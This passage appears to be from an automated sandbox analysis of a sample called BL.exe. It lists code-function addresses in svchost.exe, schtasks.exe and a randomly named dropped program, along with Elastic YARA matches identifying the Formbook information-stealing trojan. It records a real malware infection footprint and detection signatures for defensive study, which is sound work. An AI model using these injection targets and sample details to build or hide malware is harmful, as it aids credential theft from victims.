            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C02C02_2_034C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C81582_2_034C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034301002_2_03430100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA1182_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F81CC2_2_034F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F41A22_2_034F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035001AA2_2_035001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D20002_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034647502_2_03464750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034407702_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343C7C02_2_0343C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345C6E02_2_0345C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034405352_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035005912_2_03500591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F24462_2_034F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E44202_2_034E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EE4F62_2_034EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FAB402_2_034FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F6BD72_2_034F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA802_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034569622_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A02_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350A9A62_2_0350A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344A8402_2_0344A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034428402_2_03442840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E8F02_2_0346E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034268B82_2_034268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4F402_2_034B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03482F282_2_03482F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460F302_2_03460F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E2F302_2_034E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432FC82_2_03432FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344CFE02_2_0344CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BEFA02_2_034BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440E592_2_03440E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FEE262_2_034FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FEEDB2_2_034FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452E902_2_03452E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FCE932_2_034FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344AD002_2_0344AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DCD1F2_2_034DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343ADE02_2_0343ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03458DBF2_2_03458DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440C002_2_03440C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430CF22_2_03430CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0CB52_2_034E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342D34C2_2_0342D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F132D2_2_034F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0348739A2_2_0348739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345B2C02_2_0345B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E12ED2_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034452A02_2_034452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347516C2_2_0347516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342F1722_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350B16B2_2_0350B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344B1B02_2_0344B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EF0CC2_2_034EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034470C02_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F70E92_2_034F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF0E02_2_034FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF7B02_2_034FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034856302_2_03485630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F16CC2_2_034F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F75712_2_034F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035095C32_2_035095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DD5B02_2_034DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034314602_2_03431460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF43F2_2_034FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFB762_2_034FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B5BF02_2_034B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347DBF92_2_0347DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345FB802_2_0345FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFA492_2_034FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F7A462_2_034F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B3A6C2_2_034B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EDAC62_2_034EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DDAAC2_2_034DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03485AA02_2_03485AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E1AA32_2_034E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034499502_2_03449950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345B9502_2_0345B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D59102_2_034D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AD8002_2_034AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034438E02_2_034438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFF092_2_034FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03403FD22_2_03403FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03403FD52_2_03403FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03441F922_2_03441F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFFB12_2_034FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03449EB02_2_03449EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03443D402_2_03443D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F1D5A2_2_034F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F7D732_2_034F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345FDC02_2_0345FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B9C322_2_034B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFCF22_2_034FFCF2
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeCode function: 3_2_03307AE43_2_03307AE4
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeCode function: 3_2_03307AE83_2_03307AE8
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeCode function: 3_2_03307ADB3_2_03307ADB
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeCode function: 3_2_033267043_2_03326704
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeCode function: 3_2_03305EC83_2_03305EC8
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeCode function: 3_2_03307D043_2_03307D04
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeCode function: 3_2_03305D7A3_2_03305D7A
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeCode function: 3_2_03305D843_2_03305D84
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeCode function: 3_2_0330E4243_2_0330E424
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeCode function: 3_2_0330E41F3_2_0330E41F
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D802C04_2_02D802C0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DA02744_2_02DA0274
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D0E3F04_2_02D0E3F0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DC03E64_2_02DC03E6
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DBA3524_2_02DBA352
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D920004_2_02D92000
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DB81CC4_2_02DB81CC
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DC01AA4_2_02DC01AA
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DB41A24_2_02DB41A2
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D881584_2_02D88158
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D9A1184_2_02D9A118
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02CF01004_2_02CF0100
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D1C6E04_2_02D1C6E0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02CFC7C04_2_02CFC7C0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D247504_2_02D24750
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D007704_2_02D00770
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DAE4F64_2_02DAE4F6
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DB24464_2_02DB2446
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DA44204_2_02DA4420
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DC05914_2_02DC0591
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D005354_2_02D00535
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02CFEA804_2_02CFEA80
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DB6BD74_2_02DB6BD7
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DBAB404_2_02DBAB40
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D2E8F04_2_02D2E8F0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02CE68B84_2_02CE68B8
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D0A8404_2_02D0A840
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D028404_2_02D02840
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D029A04_2_02D029A0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DCA9A64_2_02DCA9A6
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D169624_2_02D16962
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DBEEDB4_2_02DBEEDB
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D12E904_2_02D12E90
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DBCE934_2_02DBCE93
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D00E594_2_02D00E59
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DBEE264_2_02DBEE26
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02CF2FC84_2_02CF2FC8
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D0CFE04_2_02D0CFE0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D7EFA04_2_02D7EFA0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D74F404_2_02D74F40
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D20F304_2_02D20F30
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DA2F304_2_02DA2F30
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D42F284_2_02D42F28
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02CF0CF24_2_02CF0CF2
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DA0CB54_2_02DA0CB5
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D00C004_2_02D00C00
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02CFADE04_2_02CFADE0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D18DBF4_2_02D18DBF
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D9CD1F4_2_02D9CD1F
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D0AD004_2_02D0AD00
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D1B2C04_2_02D1B2C0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DA12ED4_2_02DA12ED
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D052A04_2_02D052A0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D4739A4_2_02D4739A
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02CED34C4_2_02CED34C
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DB132D4_2_02DB132D
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D070C04_2_02D070C0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DAF0CC4_2_02DAF0CC
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DB70E94_2_02DB70E9
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DBF0E04_2_02DBF0E0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D0B1B04_2_02D0B1B0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DCB16B4_2_02DCB16B
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02CEF1724_2_02CEF172
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D3516C4_2_02D3516C
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DB16CC4_2_02DB16CC
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D456304_2_02D45630
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DBF7B04_2_02DBF7B0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02CF14604_2_02CF1460
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DBF43F4_2_02DBF43F
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DC95C34_2_02DC95C3
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D9D5B04_2_02D9D5B0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DB75714_2_02DB7571
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DADAC64_2_02DADAC6
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D45AA04_2_02D45AA0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D9DAAC4_2_02D9DAAC
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DA1AA34_2_02DA1AA3
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DBFA494_2_02DBFA49
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DB7A464_2_02DB7A46
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D73A6C4_2_02D73A6C
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D75BF04_2_02D75BF0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D3DBF94_2_02D3DBF9
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D1FB804_2_02D1FB80
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DBFB764_2_02DBFB76
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D038E04_2_02D038E0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D6D8004_2_02D6D800
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D099504_2_02D09950
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D1B9504_2_02D1B950
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D959104_2_02D95910
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D09EB04_2_02D09EB0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02CC3FD54_2_02CC3FD5
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02CC3FD24_2_02CC3FD2
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D01F924_2_02D01F92
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DBFFB14_2_02DBFFB1
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DBFF094_2_02DBFF09
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DBFCF24_2_02DBFCF2
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D79C324_2_02D79C32
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D1FDC04_2_02D1FDC0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DB1D5A4_2_02DB1D5A
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02D03D404_2_02D03D40
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02DB7D734_2_02DB7D73
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_00441AD04_2_00441AD0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0043CA174_2_0043CA17
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0043CA204_2_0043CA20
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0043CA244_2_0043CA24
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0043CC404_2_0043CC40
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0043ACC04_2_0043ACC0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0043AE044_2_0043AE04
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_004451704_2_00445170
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0044335B4_2_0044335B
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_004433604_2_00443360
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0045B6404_2_0045B640
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02ABE2954_2_02ABE295
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02ABE3B34_2_02ABE3B3
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02ABD7B84_2_02ABD7B8
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02ABE74C4_2_02ABE74C
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02ABCA634_2_02ABCA63
            Source: C:\Users\user\Desktop\BL.exeCode function: String function: 00445975 appears 65 times
            Source: C:\Users\user\Desktop\BL.exeCode function: String function: 0041171A appears 37 times
            Source: C:\Users\user\Desktop\BL.exeCode function: String function: 0041718C appears 45 times
            Source: C:\Users\user\Desktop\BL.exeCode function: String function: 0040E6D0 appears 35 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0342B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03475130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03487E54 appears 111 times
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: String function: 02D35130 appears 58 times
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: String function: 02D7F290 appears 105 times
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: String function: 02CEB970 appears 280 times
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: String function: 02D47E54 appears 111 times
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: String function: 02D6EA12 appears 86 times
            Source: BL.exe, 00000000.00000003.2199658329.000000000475D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs BL.exe
            Source: BL.exe, 00000000.00000003.2201502636.00000000043D3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs BL.exe
            Source: BL.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4642083493.0000000000430000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4645149295.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2374333248.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4645447566.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4645860637.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4649388492.0000000004B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2374622096.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
